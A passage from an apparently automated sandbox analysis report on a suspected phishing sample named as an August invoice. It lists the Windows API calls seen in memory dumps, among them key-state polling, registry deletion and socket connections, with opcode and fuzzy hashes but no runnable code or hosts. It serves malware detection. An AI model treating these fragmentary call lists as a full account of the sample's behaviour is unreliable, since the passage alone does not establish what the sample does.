                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Library$FreeLoad
                                                          • String ID:
                                                          • API String ID: 2449869053-0
                                                          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 004563A6
                                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                                          • GetAsyncKeyState.USER32(?), ref: 00456400
                                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                          • String ID:
                                                          • API String ID: 3539004672-0
                                                          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                          • String ID:
                                                          • API String ID: 327565842-0
                                                          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String
                                                          • String ID:
                                                          • API String ID: 2832842796-0
                                                          • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                          • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 2095303065-0
                                                          • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                          • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                          • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                          • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00436A24
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: RectWindow
                                                          • String ID:
                                                          • API String ID: 861336768-0
                                                          • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                          • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                          • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                          • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                          APIs
                                                          • SendMessageW.USER32 ref: 00449598
                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                          • _wcslen.LIBCMT ref: 0044960D
                                                          • _wcslen.LIBCMT ref: 0044961A
                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_wcslen$_wcspbrk
                                                          • String ID:
                                                          • API String ID: 1856069659-0
                                                          • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                          • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                          • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                          • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 004478E2
                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                          • GetCursorPos.USER32(00000000), ref: 0044796A
                                                          • TrackPopupMenuEx.USER32(02F463C0,00000000,00000000,?,?,00000000), ref: 00447991
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CursorMenuPopupTrack$Proc
                                                          • String ID:
                                                          • API String ID: 1300944170-0
                                                          • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                          • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                          • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                          • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 004479CC
                                                          • GetCursorPos.USER32(?), ref: 004479D7
                                                          • ScreenToClient.USER32(?,?), ref: 004479F3
                                                          • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 1822080540-0
                                                          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                          • String ID:
                                                          • API String ID: 659298297-0
                                                          • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                          • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                          • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                          • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                          APIs
                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                            • Part of subcall function 00440D98: SendMessageW.USER32(02F41B10,000000F1,00000000,00000000), ref: 00440E6E
                                                            • Part of subcall function 00440D98: SendMessageW.USER32(02F41B10,000000F1,00000001,00000000), ref: 00440E9A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableMessageSend$LongShow
                                                          • String ID:
                                                          • API String ID: 142311417-0
                                                          • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                          • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                          • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                          • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                          • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                          • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                          • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00445879
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                          • _wcslen.LIBCMT ref: 004458FB
                                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                          • String ID:
                                                          • API String ID: 3087257052-0
                                                          • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                          • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                          • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                          • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                          APIs
                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 245547762-0
                                                          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 004471D8
                                                          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                          • SelectObject.GDI32(?,00000000), ref: 00447228
                                                          • BeginPath.GDI32(?), ref: 0044723D
                                                          • SelectObject.GDI32(?,00000000), ref: 00447266
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Object$Select$BeginCreateDeletePath
                                                          • String ID:
                                                          • API String ID: 2338827641-0
                                                          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00434598
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                          • Sleep.KERNEL32(00000000), ref: 004345D4
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                          Memory Dump Source
